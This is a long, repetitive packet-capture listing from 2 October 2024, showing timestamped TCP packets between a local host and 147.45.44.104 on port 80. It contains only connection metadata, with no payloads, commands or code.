                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.685430050 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.685445070 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.686017036 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.686054945 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.686064005 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.686088085 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.686110973 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.686165094 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.686173916 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.686184883 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.686194897 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.686204910 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.686230898 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.686350107 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.686359882 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.686369896 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.686378002 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.686381102 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.686393023 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.686403036 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.686424971 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.687040091 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.687074900 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.687093019 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.690016031 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.730040073 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.730065107 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.730082035 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.730092049 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.730104923 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.730113983 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.730125904 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.730154037 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.730166912 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.730176926 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.730187893 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.730346918 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.736962080 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737024069 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737040997 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737049103 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737055063 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737068892 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737081051 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737091064 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737091064 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737102985 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737112999 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737200975 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737221003 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737231016 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737253904 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737274885 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737325907 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737385988 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737396002 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737421036 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737441063 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737447023 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737452984 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737468958 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737500906 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737518072 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737529993 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737540007 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737556934 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737586021 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737896919 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737951040 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737962008 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.737986088 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.738014936 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.738020897 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.738030910 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.738042116 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.738075018 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.738110065 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.738132000 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.738142967 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.738153934 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.738163948 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.738173008 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.738202095 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.739522934 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.739550114 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.739561081 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.739567995 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.739599943 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.739629984 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.739643097 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.739654064 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.739660978 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.739665031 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.739687920 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.739721060 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.739774942 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.739785910 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.739795923 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.739806890 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.739813089 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.739818096 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.739840031 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.739860058 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.739996910 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740009069 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740019083 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740030050 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740040064 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740048885 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740093946 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740135908 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740147114 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740158081 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740168095 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740174055 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740179062 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740189075 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740196943 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740200996 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740221024 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740240097 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740504026 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740560055 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740564108 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740576029 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740592003 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740622044 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740653038 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740664005 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740674019 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740683079 CEST8049726147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740691900 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.740720034 CEST4972680192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773309946 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773325920 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773336887 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773355961 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773365021 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773375034 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773385048 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773427963 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773458958 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773607016 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773617029 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773627996 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773638010 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773648024 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773648024 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773658991 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773663998 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773670912 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773679018 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773710966 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773853064 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773863077 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773873091 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773883104 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773886919 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773930073 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.773946047 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774111032 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774122000 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774132013 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774146080 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774153948 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774157047 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774168015 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774175882 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774178982 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774194956 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774219990 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774348021 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774358988 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774369955 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774383068 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774388075 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774388075 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774418116 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774421930 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774542093 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774554014 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774564981 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774574995 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774580002 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774586916 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774588108 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774596930 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774604082 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774632931 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774739981 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774750948 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774763107 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774785042 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774804115 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774940968 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774950981 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774962902 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774974108 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774979115 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774983883 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.774995089 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775010109 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775016069 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775016069 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775021076 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775032997 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775038958 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775074005 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775419950 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775486946 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775497913 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775526047 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775537968 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775587082 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775598049 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775609016 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775619984 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775620937 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775634050 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775651932 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775693893 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775705099 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775716066 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775739908 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775751114 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775794029 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775865078 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775875092 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775885105 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775895119 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775904894 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775913000 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775921106 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.775942087 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778395891 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778423071 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778433084 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778464079 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778477907 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778490067 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778495073 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778507948 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778527975 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778670073 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778681040 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778691053 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778697968 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778701067 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778718948 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778719902 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778728962 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778738022 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778757095 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778762102 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778770924 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778775930 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778800011 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778855085 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778866053 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778876066 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778887987 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778891087 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778909922 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.778935909 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779371023 CEST8049725147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779412031 CEST4972580192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.779442072 CEST8049725147.45.44.104192.168.2.6
